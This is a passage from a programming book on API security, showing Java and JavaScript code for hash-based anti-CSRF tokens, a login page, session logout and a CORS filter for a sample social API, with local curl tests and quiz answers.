Check the documentation for your programming language to see if it offers a similar
facility.
Listing 4.11
Preventing CSRF in CookieTokenStore
136
CHAPTER 4
Session cookie authentication
return Base64url.encode(sha256(session.id()));
}
@Override
public Optional<Token> read(Request request, String tokenId) {
var session = request.session(false);
if (session == null) {
return Optional.empty();
}
var provided = Base64url.decode(tokenId);
var computed = sha256(session.id());
if (!MessageDigest.isEqual(computed, provided)) {
return Optional.empty();
}
var token = new Token(session.attribute("expiry"),
session.attribute("username"));
token.attributes.putAll(session.attribute("attrs"));
return Optional.of(token);
}
static byte[] sha256(String tokenId) {
try {
var sha256 = MessageDigest.getInstance("SHA-256");
return sha256.digest(
tokenId.getBytes(StandardCharsets.UTF_8));
} catch (NoSuchAlgorithmException e) {
throw new IllegalStateException(e);
}
}
}
The TokenController already returns the token ID to the client in the JSON body of
the response to the login endpoint. This will now return the SHA-256 hashed version,
because that is what the CookieTokenStore returns. This has an added security bene-
fit that the real session ID is now never exposed to JavaScript, even in that response.
While you could alter the TokenController to set the CSRF token as a cookie directly,
it is better to leave this up to the client. A JavaScript client can set the cookie after
login just as easily as the API can, and as you will see in chapter 5, there are alternatives
to cookies for storing these tokens. The server doesn’t care where the client stores the
CSRF token, so long as the client can find it again after page reloads and redirects and
so on.
The final step is to update the TokenController token validation method to look
for the CSRF token in the X-CSRF-Token header on every request. If the header is not
present, then the request should be treated as unauthenticated. Otherwise, you can
pass the CSRF token down to the CookieTokenStore as the tokenId parameter as
Return the SHA-256 hash
of the session cookie,
Base64url-encoded.
Decode the supplied
token ID and compare
it to the SHA-256 of
the session.
If the CSRF token
doesn’t match the
session hash, then
reject the request.
Use the Java
MessageDigest
class to hash
the session ID.
137
Preventing Cross-Site Request Forgery attacks
shown in listing 4.12. If the header isn’t present, then return without validating the
cookie. Together with the hash check inside the CookieTokenStore, this ensures that
requests without a valid CSRF token, or with an invalid one, will be treated as if they
didn’t have a session cookie at all and will be rejected if authentication is required. To
make the changes, open TokenController.java in your editor and update the validate-
Token method to match listing 4.12.
public void validateToken(Request request, Response response) {
var tokenId = request.headers("X-CSRF-Token");
if (tokenId == null) return;
tokenStore.read(request, tokenId).ifPresent(token -> {
if (now().isBefore(token.expiry)) {
request.attribute("subject", token.username);
token.attributes.forEach(request::attribute);
}
});
}
TRYING IT OUT
If you restart the API, you can try out some requests to see the CSRF protections in
action. First, create a test user as before:
$ curl -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}' \
https://localhost:4567/users
{"username":"test"}
You can then login to create a new session. Notice how the token returned in the
JSON is now different to the session ID in the cookie.
$ curl -i -c /tmp/cookies -u test:password \
-H 'Content-Type: application/json' \
-X POST https://localhost:4567/sessions
HTTP/1.1 201 Created
Date: Mon, 20 May 2019 16:07:42 GMT
Set-Cookie:
JSESSIONID=node01n8sqv9to4rpk11gp105zdmrhd0.node0;Path=/;Secure;HttpOnly
…
{"token":"gB7CiKkxx0FFsR4lhV9hsvA1nyT7Nw5YkJw_ysMm6ic"}
If you send the correct X-CSRF-Token header, then requests succeed as expected:
$ curl -i -b /tmp/cookies -H 'Content-Type: application/json' \
-H 'X-CSRF-Token: gB7CiKkxx0FFsR4lhV9hsvA1nyT7Nw5YkJw_ysMm6ic' \
-d '{"name":"test space","owner":"test"}' \
https://localhost:4567/spaces
HTTP/1.1 201 Created
…
{"name":"test space","uri":"/spaces/1"}
Listing 4.12
The updated token validation method
Read the CSRF token from
the X-CSRF-Token header.
Pass the CSRF
token to the
TokenStore as the
tokenId parameter.
The session ID in the cookie
is different to the hashed
one in the JSON body.
138
CHAPTER 4
Session cookie authentication
If you leave out the X-CSRF-Token header, then requests are rejected as if they were
unauthenticated:
$ curl -i -b /tmp/cookies -H 'Content-Type: application/json' \
-d '{"name":"test space","owner":"test"}' \
https://localhost:4567/spaces
HTTP/1.1 401 Unauthorized
…
4.5
Building the Natter login UI
Now that you’ve got session-based login working from the command line, it’s time to
build a web UI to handle login. In this section, you’ll put together a simple login UI,
much like the existing Create Space UI that you created earlier, as shown in figure 4.13.
When the API returns a 401 response, indicating that the user requires authentica-
tion, the Natter UI will redirect to the login UI. The login UI will then submit the
username and password to the API login endpoint to get a session cookie, set the anti-
CSRF token as a second cookie, and then redirect back to the main Natter UI.
While it is possible to intercept the 401 response from the API in JavaScript, it is
not possible to stop the browser popping up the ugly default login box when it
receives a WWW-Authenticate header prompting it for Basic authentication creden-
tials. To get around this, you can simply remove that header from the response when
the user is not authenticated. Open the UserController.java file in your editor and
update the requireAuthentication method to omit this header on the response. The
Pop quiz
4
Given a cookie set by https:/ /api.example.com:8443 with the attribute Same-
Site=strict, which of the following web pages will be able to make API calls to
api.example.com with the cookie included? (There may be more than one correct
answer.)
a
http:/ /www .example.com/test
b
https:/ /other.com:8443/test
c
https:/ /www .example.com:8443/test
d
https:/ /www .example.org:8443/test
e
https:/ /api.example.com:8443/test
5
What problem with traditional double-submit cookies is solved by the hash-based
approach described in section 4.4.2?
a
Insufficient crypto magic.
b
Browsers may reject the second cookie.
c
An attacker may be able to overwrite the second cookie.
d
An attacker may be able to guess the second cookie value.
e
An attacker can exploit a timing attack to discover the second cookie value.
The answers are at the end of the chapter.
139
Building the Natter login UI
new implementation is shown in listing 4.13. Save the file when you are happy with
the change.
public void requireAuthentication(Request request, Response response) {
if (request.attribute("subject") == null) {
halt(401);
}
}
Technically, sending a 401 response and not including a WWW-Authenticate header is
in violation of the HTTP standard (see https://tools.ietf.org/html/rfc7235#section-3.1
for the details), but the pattern is now widespread. There is no standard HTTP auth
scheme for session cookies that could be used. In the next chapter, you will learn
about the Bearer auth scheme used by OAuth2.0, which is becoming widely adopted
for this purpose.
The HTML for the login page is very similar to the existing HTML for the Create
Space page that you created earlier. As before, it has a simple form with two input
fields for the username and password, with some simple CSS to style it. Use an input
with type="password" to ensure that the browser hides the password from anybody
watching over the user’s shoulder. To create the new page, navigate to src/main/
resources/public and create a new file named login.html. Type the contents of list-
ing 4.14 into the new file and click save. You’ll need to rebuild and restart the API
for the new page to become available, but first you need to implement the JavaScript
login logic.
<!DOCTYPE html>
<html>
<head>
<title>Natter!</title>
<script type="text/javascript" src="login.js"></script>
<style type="text/css">
Listing 4.13
The updated authentication check
Listing 4.14
The login form HTML
Figure 4.13
The login UI features a
simple username and password form.
Once successfully submitted, the form
will redirect to the main natter.html UI
page that you built earlier.
Halt with a 401 error if the user
is not authenticated but leave out
the WWW-Authenticate header.
140
CHAPTER 4
Session cookie authentication
input { margin-right: 100% }
</style>
</head>
<body>
<h2>Login</h2>
<form id="login">
<label>Username: <input name="username" type="text"
id="username">
</label>
<label>Password: <input name="password" type="password"
id="password">
</label>
<button type="submit">Login</button>
</form>
</body>
</html>
4.5.1
Calling the login API from JavaScript
You can use the fetch API in the browser to make a call to the login endpoint, just as
you did previously. Create a new file named login.js next to the login.html you just
added and save the contents of listing 4.15 to the file. The listing adds a login(user-
name, password) function that manually Base64-encodes the username and password
and adds them as an Authorization header on a fetch request to the /sessions end-
point. If the request is successful, then you can extract the anti-CSRF token from the
JSON response and set it as a cookie by assigning to the document.cookie field.
Because the cookie needs to be accessed from JavaScript, you cannot mark it as Http-
Only, but you can apply other security attributes to prevent it accidentally leaking.
Finally, redirect the user back to the Create Space UI that you created earlier. The rest
of the listing intercepts the form submission, just as you did for the Create Space form
at the start of this chapter.
const apiUrl = 'https://localhost:4567';
function login(username, password) {
let credentials = 'Basic ' + btoa(username + ':' + password);
fetch(apiUrl + '/sessions', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': credentials
}
})
.then(res => {
if (res.ok) {
res.json().then(json => {
document.cookie = 'csrfToken=' + json.token +
';Secure;SameSite=strict';
window.location.replace('/natter.html');
Listing 4.15
Calling the login endpoint from JavaScript
As before, customize
the CSS to style the
form as you wish.
The username field is
a simple text field.
Use a HTML
password input
field for passwords.
Encode the
credentials
for HTTP Basic
authentication.
If successful, then
set the csrfToken
cookie and redirect
to the Natter UI.
141
Building the Natter login UI
});
}
})
.catch(error => console.error('Error logging in: ', error));
}
window.addEventListener('load', function(e) {
document.getElementById('login')
.addEventListener('submit', processLoginSubmit);
});
function processLoginSubmit(e) {
e.preventDefault();
let username = document.getElementById('username').value;
let password = document.getElementById('password').value;
login(username, password);
return false;
}
Rebuild and restart the API using
mvn clean compile exec:java
and then open a browser and navigate to https://localhost:4567/login.html. If you
open your browser’s developer tools, you can examine the HTTP requests that get
made as you interact with the UI. Create a test user on the command line as before:
curl -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}' \
https://localhost:4567/users
Then type in the same username and password into the login UI and click Login. You
will see a request to /sessions with an Authorization header with the value Basic
dGVzdDpwYXNzd29yZA==. In response, the API returns a Set-Cookie header for the ses-
sion cookie and the anti-CSRF token in the JSON body. You will then be redirected to
the Create Space page. If you examine the cookies in your browser you will see both
the JSESSIONID cookie set by the API response and the csrfToken cookie set by Java-
Script, as in figure 4.14.
Otherwise, log the
error to the console.
Set up an
event listener
to intercept
form submit,
just as you did
for the Create
Space UI.
Figure 4.14
The two cookies viewed in Chrome’s developer tools. The JSESSIONID cookie is set by the API and
marked as HttpOnly. The csrfToken cookie is set by JavaScript and left accessible so that the Natter UI can send
it as a custom header.
142
CHAPTER 4
Session cookie authentication
If you try to actually create a new social space, the request is blocked by the API
because you are not yet including the anti-CSRF token in the requests. To do that, you
need to update the Create Space UI to extract the csrfToken cookie value and
include it as the X-CSRF-Token header on each request. Getting the value of a cookie
in JavaScript is slightly more complex than it should be, as the only access is via the
document.cookie field that stores all cookies as a semicolon-separated string. Many
JavaScript frameworks include convenience functions for parsing this cookie string,
but you can do it manually with code like the following that splits the string on semi-
colons, then splits each individual cookie by equals sign to separate the cookie name
from its value. Finally, URL-decode each component and check if the cookie with the
given name exists:
function getCookie(cookieName) {
var cookieValue = document.cookie.split(';')
.map(item => item.split('=')
.map(x => decodeURIComponent(x.trim())))
.filter(item => item[0] === cookieName)[0]
if (cookieValue) {
return cookieValue[1];
}
}
You can use this helper function to update the Create Space page to submit the CSRF-
token with each request. Open the natter.js file in your editor and add the getCookie
function. Then update the createSpace function to extract the CSRF token from the
cookie and include it as an extra header on the request, as shown in listing 4.16. As a
convenience, you can also update the code to check for a 401 response from the API
request and redirect to the login page in that case. Save the file and rebuild the API
and you should now be able to login and create a space through the UI.
function createSpace(name, owner) {
let data = {name: name, owner: owner};
let csrfToken = getCookie('csrfToken');
fetch(apiUrl + '/spaces', {
method: 'POST',
credentials: 'include',
body: JSON.stringify(data),
headers: {
'Content-Type': 'application/json',
'X-CSRF-Token': csrfToken
}
})
.then(response => {
if (response.ok) {
return response.json();
Listing 4.16
Adding the CSRF token to requests
Split the cookie string
into individual cookies.
Then split each
cookie into name
and value parts.
Decode each part.
Find the cookie with
the given name.
Extract the CSRF
token from the
cookie.
Include the CSRF token
as the X-CSRF-Token
header.
143
Implementing logout
} else if (response.status === 401) {
window.location.replace('/login.html');
} else {
throw Error(response.statusText);
}
})
.then(json => console.log('Created space: ', json.name, json.uri))
.catch(error => console.error('Error: ', error));
}
4.6
Implementing logout
Imagine you’ve logged into Natter from a shared computer, perhaps while visiting
your friend Amit’s house. After you’ve posted your news, you’d like to be able to log
out so that Amit can’t read your private messages. After all, the inability to log out was
one of the drawbacks of HTTP Basic authentication identified in section 4.2.3. To
implement logout, it’s not enough to just remove the cookie from the user’s browser
(although that’s a good start). The cookie should also be invalidated on the server in
case removing it from the browser fails for any reason3 or if the cookie may be
retained by a badly configured network cache or other faulty component.
To implement logout, you can add a new method to the TokenStore interface,
allowing a token to be revoked. Token revocation ensures that the token can no longer
be used to grant access to your API, and typically involves deleting it from the server-
side store. Open TokenStore.java in your editor and add a new method declaration
for token revocation next to the existing methods to create and read a token:
String create(Request request, Token token);
Optional<Token> read(Request request, String tokenId);
void revoke(Request request, String tokenId);
You can implement token revocation for session cookies by simply calling the session
.invalidate() method in Spark. This will remove the session token from the back-
end store and add a new Set-Cookie header on the response with an expiry time in the
past. This will cause the browser to immediately delete the existing cookie. Open
CookieTokenStore.java in your editor and add the new revoke method shown in list-
ing 4.17. Although it is less critical on a logout endpoint, you should enforce CSRF
defenses here too to prevent an attacker maliciously logging out your users to annoy
them. To do this, verify the SHA-256 anti-CSRF token just as you did in section 4.5.3.
@Override
public void revoke(Request request, String tokenId) {
var session = request.session(false);
if (session == null) return;
3 Removing a cookie can fail if the Path or Domain attributes do not exactly match, for example.
Listing 4.17
Revoking a session cookie
If you receive a
401 response,
then redirect to
the login page.
New method to
revoke a token
144
CHAPTER 4
Session cookie authentication
var provided = Base64url.decode(tokenId);
var computed = sha256(session.id());
if (!MessageDigest.isEqual(computed, provided)) {
return;
}
session.invalidate();
}
You can now wire up a new logout endpoint. In keeping with our REST-like approach,
you can implement logout as a DELETE request to the /sessions endpoint. If clients
send a DELETE request to /sessions/xyz, where xyz is the token ID, then the token
may be leaked in either the browser history or in server logs. While this may not be a
problem for a logout endpoint because the token will be revoked anyway, you should
avoid exposing tokens directly in URLs like this. So, in this case, you’ll implement
logout as a DELETE request to the /sessions endpoint (with no token ID in the
URL) and the endpoint will retrieve the token ID from the X-CSRF-Token header
instead. While there are ways to make this more RESTful, we will keep it simple in this
chapter. Listing 4.18 shows the new logout endpoint that retrieves the token ID from
the X-CSRF-Token header and then calls the revoke endpoint on the TokenStore.
Open TokenController.java in your editor and add the new method.
public JSONObject logout(Request request, Response response) {
var tokenId = request.headers("X-CSRF-Token");
if (tokenId == null)
throw new IllegalArgumentException("missing token header");
tokenStore.revoke(request, tokenId);
response.status(200);
return new JSONObject();
}
Now open Main.java in your editor and add a mapping for the logout endpoint to be
called for DELETE requests to the session endpoint:
post("/sessions", tokenController::login);
delete("/sessions", tokenController::logout);
Calling the logout endpoint with a genuine session cookie and CSRF token results in
the cookie being invalidated and subsequent requests with that cookie are rejected. In
this case, Spark doesn’t even bother to delete the cookie from the browser, relying
purely on server-side invalidation. Leaving the invalidated cookie on the browser is
harmless.
Listing 4.18
The logout endpoint
Verify the
anti-CSRF token
as before.
Invalidate the
session cookie.
Get the token ID
from the X-CSRF-
Token header.
Revoke the token.
Return a success
response.
The new
logout route
145
Summary
Answers to pop quiz questions
1
d. The protocol, hostname, and port must all exactly match. The path part of a
URI is ignored by the SOP. The default port for HTTP URIs is 80 and is 443 for
HTTPS.
2
e. To avoid session fixation attacks, you should invalidate any existing session
cookie after the user authenticates to ensure that a fresh session is created.
3
b. The HttpOnly attribute prevents cookies from being accessible to JavaScript.
4
a, c, e. Recall from section 4.5.1 that only the registerable domain is considered
for SameSite cookies—example.com in this case. The protocol, port, and path
are not significant.
5
c. An attacker may be able to overwrite the cookie with a predictable value
using XSS, or if they compromise a sub-domain of your site. Hash-based values
are not in themselves any less guessable than any other value, and timing attacks
can apply to any solution.
Summary
HTTP Basic authentication is awkward for web browser clients and has a poor
user experience. You can use token-based authentication to provide a more nat-
ural login experience for these clients.
For web-based clients served from the same site as your API, session cookies are
a simple and secure token-based authentication mechanism.
Session fixation attacks occur if the session cookie doesn’t change when a user
authenticates. Make sure to always invalidate any existing session before logging
the user in.
CSRF attacks can allow other sites to exploit session cookies to make requests to
your API without the user’s consent. Use SameSite cookies and the hash-based
double-submit cookie pattern to eliminate CSRF attacks.
146
Modern token-based
authentication
With the addition of session cookie support, the Natter UI has become a slicker
user experience, driving adoption of your platform. Marketing has bought a new
domain name, nat.tr, in a doomed bid to appeal to younger users. They are insist-
ing that logins should work across both the old and new domains, but your CSRF
protections prevent the session cookies being used on the new domain from talking
to the API on the old one. As the user base grows, you also want to expand to include
mobile and desktop apps. Though cookies work great for web browser clients, they
are less natural for native apps because the client typically must manage them itself.
You need to move beyond cookies and consider other ways to manage token-based
authentication.
In this chapter, you’ll learn about alternatives to cookies using HTML 5 Web Stor-
age and the standard Bearer authentication scheme for token-based authentication.
This chapter covers
Supporting cross-domain web clients with CORS
Storing tokens using the Web Storage API
The standard Bearer HTTP authentication scheme
for tokens
Hardening database token storage
147
Allowing cross-domain requests with CORS
You’ll enable cross-origin resource sharing (CORS) to allow cross-domain requests from the
new site.
DEFINITION
Cross-origin resource sharing (CORS) is a standard to allow some
cross-origin requests to be permitted by web browsers. It defines a set of headers
that an API can return to tell the browser which requests should be allowed.
Because you’ll no longer be using the built-in cookie storage in Spark, you’ll develop
secure token storage in the database and see how to apply modern cryptography to
protect tokens from a variety of threats.
5.1
Allowing cross-domain requests with CORS
To help Marketing out with the new domain name, you agree to investigate how you
can let the new site communicate with the existing API. Because the new site has a dif-
ferent origin, the same-origin policy (SOP) you learned about in chapter 4 throws up
several problems for cookie-based authentication:
Attempting to send a login request from the new site is blocked because the
JSON Content-Type header is disallowed by the SOP.
Even if you could send the request, the browser will ignore any Set-Cookie
headers on a cross-origin response, so the session cookie will be discarded.
You also cannot read the anti-CSRF token, so cannot make requests from the
new site even if the user is already logged in.
Moving to an alternative token storage mechanism solves only the second issue, but if
you want to allow cross-origin requests to your API from browser clients, you’ll need to
solve the others. The solution is the CORS standard, introduced in 2013 to allow the
SOP to be relaxed for some cross-origin requests.
There are several ways to simulate cross-origin requests on your local development
environment, but the simplest is to just run a second copy of the Natter API and UI on
a different port. (Remember that an origin is the combination of protocol, host name, and
port, so a change to any of these will cause the browser to treat it as a separate origin.)
To allow this, open Main.java in your editor and add the following line to the top of
the method before you create any routes to allow Spark to use a different port:
port(args.length > 0 ? Integer.parseInt(args[0])
: spark.Service.SPARK_DEFAULT_PORT);
You can now start a second copy of the Natter UI by running the following command:
mvn clean compile exec:java -Dexec.args=9999
If you now open your web browser and navigate to https:/ /localhost:9999/natter.html,
you’ll see the familiar Natter Create Space form. Because the port is different and
148
CHAPTER 5
Modern token-based authentication
Natter API requests violate the SOP, this will be treated as a separate origin by the
browser, so any attempt to create a space or login will be rejected, with a cryptic error
message in the JavaScript console about being blocked by CORS policy (figure 5.1).
You can fix this by adding CORS headers to the API responses to explicitly allow some
cross-origin requests.
5.1.1
Preflight requests
Before CORS, browsers blocked requests that violated the SOP. Now, the browser
makes a preflight request to ask the server of the target origin whether the request
should be allowed, as shown in figure 5.2.
DEFINITION
A preflight request occurs when a browser would normally block
the request for violating the same-origin policy. The browser makes an HTTP
OPTIONS request to the server asking if the request should be allowed. The
server can either deny the request or else allow it with restrictions on the
allowed headers and methods.
The browser first makes an HTTP OPTIONS request to the target server. It includes
the origin of the script making the request as the value of the Origin header, along
with some headers indicating the HTTP method of the method that was requested
(Access-Control-Request-Method header) and any nonstandard headers that were in
the original request (Access-Control-Request-Headers).
The server responds by sending back a response with headers to indicate which
cross-origin requests it considers acceptable. If the original request does not match
the server’s response, or the server does not send any CORS headers in the response,
then the browser blocks the request. If the original request is allowed, the API can also
set CORS headers in the response to that request to control how much of the
response is revealed to the client. An API might therefore agree to allow cross-origin
requests with nonstandard headers but prevent the client from reading the response.
Figure 5.1
An example of a CORS error when trying to make a cross-origin request that violates the same-origin
policy
149
Allowing cross-domain requests with CORS
Web browser
api.example.com
SOP +
CORS
Preflight request
JavaScript from
example.org tries to make
a non-simple request to
api.example.com.
Rather than blocking the request,
the browser makes a preflight
request to the server to check if
it should be allowed.
Web browser
api.example.com
SOP +
CORS
Access-Control-
Allow-Origin:
example.org
If the API returns a CORS header
allowing requests from this origin,
then the original request is performed.
Web browser
api.example.com
SOP +
CORS
Original request
Web browser
api.example.com
SOP +
CORS
Otherwise, the request is blocked.
JavaScript
client
example.org
JavaScript
client
example.org
JavaScript
client
example.org
JavaScript
client
example.org
Figure 5.2
When a script tries to make a cross-origin request that would be blocked by
the SOP, the browser makes a CORS preflight request to the target server to ask if the
request should be permitted. If the server agrees, and any conditions it specifies are
satisfied, then the browser makes the original request and lets the script see the
response. Otherwise, the browser blocks the request.
150
CHAPTER 5
Modern token-based authentication
5.1.2
CORS headers
The CORS headers that the server can send in the response are summarized in table 5.1.
You can learn more about CORS headers from Mozilla’s excellent article at https://
developer.mozilla.org/en-US/docs/Web/HTTP/CORS. The Access-Control-Allow-
Origin and Access-Control-Allow-Credentials headers can be sent in the response to
the preflight request and in the response to the actual request, whereas the other
headers are sent only in response to the preflight request, as indicated in the second
column where “Actual” means the header can be sent in response to the actual request,
“Preflight” means it can be sent only in response to a preflight request, and “Both”
means it can be sent on either.
TIP
If you return a specific allowed origin in the Access-Control-Allow-
Origin response header, then you should also include a Vary: Origin header
to ensure the browser and any network proxies only cache the response for
this specific requesting origin.
Table 5.1
CORS response headers
CORS header
Response
Description
Access-Control-Allow-
Origin
Both
Specifies a single origin that should be allowed
access, or else the wildcard * that allows access
from any origin.
Access-Control-Allow-
Headers
Preflight
Lists the non-simple headers that can be included on
cross-origin requests to this server. The wildcard
value * can be used to allow any headers.
Access-Control-Allow-
Methods
Preflight
Lists the HTTP methods that are allowed, or the
wildcard * to allow any method.
Access-Control-Allow-
Credentials
Both
Indicates whether the browser should include cre-
dentials on the request. Credentials in this case
means browser cookies, saved HTTP Basic/Digest
passwords, and TLS client certificates. If set to
true, then none of the other headers can use a
wildcard value.
Access-Control-Max-Age
Preflight
Indicates the maximum number of seconds that the
browser should cache this CORS response. Brows-
ers typically impose a hard-coded upper limit on this
value of around 24 hours or less (Chrome currently
limits this to just 10 minutes). This only applies to
the allowed headers and allowed methods.
Access-Control-Expose-
Headers
Actual
Only a small set of basic headers are exposed from
the response to a cross-origin request by default.
Use this header to expose any nonstandard headers
that your API returns in responses.
151
Allowing cross-domain requests with CORS
Because the Access-Control-Allow-Origin header allows only a single value to be speci-
fied, if you want to allow access from more than one origin, then your API server
needs to compare the Origin header received in a request against an allowed set and,
if it matches, echo the origin back in the response. If you read about Cross-Site Script-
ing (XSS) and header injection attacks in chapter 2, then you may be worried about
reflecting a request header back in the response. But in this case, you do so only after
an exact comparison with a list of trusted origins, which prevents an attacker from
including untrusted content in that response.
5.1.3
Adding CORS headers to the Natter API
Armed with your new knowledge of how CORS works, you can now add appropriate
headers to ensure that the copy of the UI running on a different origin can access the
API. Because cookies are considered a credential by CORS, you need to return an
Access-Control-Allow-Credentials: true header from preflight requests; other-
wise, the browser will not send the session cookie. As mentioned in the last section,
this means that the API must return the exact origin in the Access-Control-Allow-
Origin header and cannot use any wildcards.
TIP
Browsers will also ignore any Set-Cookie headers in the response to a CORS
request unless the response contains Access-Control-Allow-Credentials:
true. This header must therefore be returned on responses to both preflight
requests and the actual request for cookies to work. Once you move to non-
cookie methods later in this chapter, you can remove these headers.
To add CORS support, you’ll implement a simple filter that lists a set of allowed ori-
gins, shown in listing 5.1. For all requests, if the Origin header in the request is in the
allowed list then you should set the basic Access-Control-Allow-Origin and Access-
Control-Allow-Credentials headers. If the request is a preflight request, then the
request can be terminated immediately using the Spark halt() method, because no
further processing is required. Although no specific status codes are required by
CORS, it is recommended to return a 403 Forbidden error for preflight requests from
unauthorized origins, and a 204 No Content response for successful preflight requests.
You should add CORS headers for any headers and request methods that your API
requires for any endpoint. As CORS responses relate to a single request, you could
vary the response for each API endpoint, but this is rarely done. The Natter API sup-
ports GET, POST, and DELETE requests, so you should list those. You also need to list
the Authorization header for login to work, and the Content-Type and X-CSRF-Token
headers for normal API calls to function.
For non-preflight requests, you can let the request proceed once you have added
the basic CORS response headers. To add the CORS filter, navigate to src/main/
java/com/manning/apisecurityinaction and create a new file named CorsFilter.java
in your editor. Type in the contents of listing 5.1, and click Save.
152
CHAPTER 5
Modern token-based authentication
package com.manning.apisecurityinaction;
import spark.*;
import java.util.*;
import static spark.Spark.*;
class CorsFilter implements Filter {
private final Set<String> allowedOrigins;
CorsFilter(Set<String> allowedOrigins) {
this.allowedOrigins = allowedOrigins;
}
@Override
public void handle(Request request, Response response) {
var origin = request.headers("Origin");
if (origin != null && allowedOrigins.contains(origin)) {
response.header("Access-Control-Allow-Origin", origin);
response.header("Access-Control-Allow-Credentials",
"true");
response.header("Vary", "Origin");
}
if (isPreflightRequest(request)) {
if (origin == null || !allowedOrigins.contains(origin)) {
halt(403);
}
CORS and SameSite cookies
SameSite cookies, described in chapter 4, are fundamentally incompatible with CORS.
If a cookie is marked as SameSite, then it will not be sent on cross-site requests
regardless of any CORS policy and the Access-Control-Allow-Credentials header is
ignored. An exception is made for origins that are sub-domains of the same site; for
example, www.example.com can still send requests to api.example.com, but genuine
cross-site requests to different registerable domains are disallowed. If you need to
allow cross-site requests with cookies, then you should not use SameSite cookies.
A complication came in October 2019, when Google announced that its Chrome web
browser would start marking all cookies as SameSite=lax by default with the release
of Chrome 80 in February 2020. (At the time of writing the rollout of this change has
been temporarily paused due to the COVID-19 coronavirus pandemic.) If you wish to
use cross-site cookies you must now explicitly opt-out of SameSite protections by
adding the SameSite=none and Secure attributes to those cookies, but this can
cause problems in some web browsers (see https://www.chromium.org/updates/
same-site/incompatible-clients). Google, Apple, and Mozilla are all becoming more
aggressive in blocking cross-site cookies to prevent tracking and other security or pri-
vacy issues. It’s clear that the future of cookies will be restricted to HTTP requests
within the same site and that alternative approaches, such as those discussed in the
rest of this chapter, must be used for all other cases.
Listing 5.1
CORS filter
If the origin is
allowed, then
add the basic
CORS headers
to the response.
If the origin
is not allowed,
then reject the
preflight request.
153
Allowing cross-domain requests with CORS
response.header("Access-Control-Allow-Headers",
"Content-Type, Authorization, X-CSRF-Token");
response.header("Access-Control-Allow-Methods",
"GET, POST, DELETE");
halt(204);
}
}
private boolean isPreflightRequest(Request request) {
return "OPTIONS".equals(request.requestMethod()) &&
request.headers().contains("Access-Control-Request-Method");
}
}
To enable the CORS filter, you need to add it to the main method as a Spark before()
filter, so that it runs before the request is processed. CORS preflight requests should
be handled before your API requests authentication because credentials are never
sent on a preflight request, so it would always fail otherwise. Open the Main.java file in
your editor (it should be right next to the new CorsFilter.java file you just created) and
find the main method. Add the following call to the main method right after the rate-
limiting filter that you added in chapter 3:
var rateLimiter = RateLimiter.create(2.0d);
before((request, response) -> {
if (!rateLimiter.tryAcquire()) {
halt(429);
}
});
before(new CorsFilter(Set.of("https://localhost:9999")));
This ensures the new UI server running on port 9999 can make requests to the API.
If you now restart the API server on port 4567 and retry making requests from the
alternative UI on port 9999, you’ll be able to login. However, if you now try to create
a space, the request is rejected with a 401 response and you’ll end up back at the
login page!
TIP
You don’t need to list the original UI running on port 4567, because this
is served from the same origin as the API and won’t be subject to CORS
checks by the browser.
The reason why the request is blocked is due to another subtle detail when enabling
CORS with cookies. In addition to the API returning Access-Control-Allow-Credentials
on the response to the login request, the client also needs to tell the browser that it
expects credentials on the response. Otherwise the browser will ignore the Set-Cookie
header despite what the API says. To allow cookies in the response, the client must set
the credentials field on the fetch request to include. Open the login.js file in your
For permitted preflight
requests, return a 204
No Content status.
Preflight requests use the HTTP OPTIONS method
and include the CORS request method header.
The existing rate-
limiting filter
The new
CORS filter
154
CHAPTER 5
Modern token-based authentication
editor and change the fetch request in the login function to the following. Save the
file and restart the UI running on port 9999 to test the changes:
fetch(apiUrl + '/sessions', {
method: 'POST',
credentials: 'include',
headers: {
'Content-Type': 'application/json',
'Authorization': credentials
}
})
If you now log in again and repeat the request to create a space, it will succeed because
the cookie and CSRF token are finally present on the request.
5.2
Tokens without cookies
With a bit of hard work on CORS, you’ve managed to get cookies working from the
new site. Something tells you that the extra work you needed to do just to get cook-
ies to work is a bad sign. You’d like to mark your cookies as SameSite as a defense in
depth against CSRF attacks, but SameSite cookies are incompatible with CORS.
Apple’s Safari browser is also aggressively blocking cookies on some cross-site requests
for privacy reasons, and some users are doing this manually through browser set-
tings and extensions. So, while cookies are still a viable and simple solution for web
clients on the same domain as your API, the future looks bleak for cookies with
cross-origin clients. You can future-proof your API by moving to an alternative token
storage format.
Cookies are such a compelling option for web-based clients because they provide
the three components needed to implement token-based authentication in a neat pre-
packaged bundle (figure 5.3):
Pop quiz
1
Given a single-page app running at https:/ /www.example.com/app and a cookie-
based API login endpoint at https:/ /api.example.net/login, what CORS headers
in addition to Access-Control-Allow-Origin are required to allow the cookie
to be remembered by the browser and sent on subsequent API requests?
a
Access-Control-Allow-Credentials: true only on the actual response.
b
Access-Control-Expose-Headers: Set-Cookie on the actual response.
c
Access-Control-Allow-Credentials: true only on the preflight response.
d
Access-Control-Expose-Headers: Set-Cookie on the preflight response.
e
Access-Control-Allow-Credentials: true on the preflight response and
Access-Control-Allow-Credentials: true on the actual response.
The answer is at the end of the chapter.
Set the credentials field to
“include” to allow the API to
set cookies on the response.
155
Tokens without cookies
A standard way to communicate tokens between the client and the server, in the
form of the Cookie and Set-Cookie headers. Browsers will handle these headers
for your clients automatically, and make sure they are only sent to the correct site.
A convenient storage location for tokens on the client, that persists across page
loads (and reloads) and redirections. Cookies can also survive a browser restart
and can even be automatically shared between devices, such as with Apple’s
Handoff functionality.1
Simple and robust server-side storage of token state, as most web frameworks
support cookie storage out of the box just like Spark.
To replace cookies, you’ll therefore need a replacement for each of these three
aspects, which is what this chapter is all about. On the other hand, cookies come with
unique problems such as CSRF attacks that are often eliminated by moving to an alter-
native scheme.
5.2.1
Storing token state in a database
Now that you’ve abandoned cookies, you also lose the simple server-side storage
implemented by Spark and other frameworks. The first task then is to implement a
replacement. In this section, you’ll implement a DatabaseTokenStore that stores
token state in a new database table in the existing SQL database.
1 https://support.apple.com/en-gb/guide/mac-help/mchl732d3c0a/mac
Web browser client
API server
Response
Token store
Cookie
Set-Cookie
Cookie jar
Web browsers store
cookies automatically
in a cookie jar.
Cookies are communicated
between client and server
using standard headers.
Server frameworks
automatically persist
cookie state in a
backend store.
Request
Figure 5.3
Cookies provide the three key components of token-based authentication:
client-side token storage, server-side state, and a standard way to communicate cookies
between the client and server with the Set-Cookie and Cookie headers.
156
CHAPTER 5
Modern token-based authentication
A token is a simple data structure that should be independent of dependencies on
other functionality in your API. Each token has a token ID and a set of attributes asso-
